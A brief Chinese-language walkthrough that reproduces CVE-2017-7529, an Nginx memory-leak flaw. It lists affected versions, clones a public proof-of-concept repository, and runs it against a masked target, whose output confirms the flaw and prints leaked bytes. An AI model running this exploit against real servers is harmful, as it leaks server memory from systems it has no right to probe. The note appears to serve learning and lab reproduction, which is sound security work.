影響範圍:
Nginx 0.5.6 - 1.13.2
復現:
//下載poc
C:\Users\17273\Downloads\wordpress46-learn-master>git clone https://github.com/en0f/CVE-2017-7529_PoC
Cloning into 'CVE-2017-7529_PoC'...
remote: Enumerating objects: 6, done.
remote: Total 6 (delta 0), reused 0 (delta 0), pack-reused 6
Unpacking objects: 100% (6/6), done.
C:\Users\17273\Downloads\wordpress46-learn-master>cd CVE-2017-7529_PoC
//利用
C:\Users\17273\Downloads\wordpress46-learn-master\CVE-2017-7529_PoC>python CVE-2017-7529_PoC.py http://xxx.xxx.xxx:xxxx/
[+] xxx.xxx.xxx:xxxx is Vulnerable: TRUE
[i] Receiving Data [2805 bytes] ...
- 0000: 2d 2d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 --00000000000000
參考文獻:
https://blog.csdn.net/qq_29647709/article/details/85076309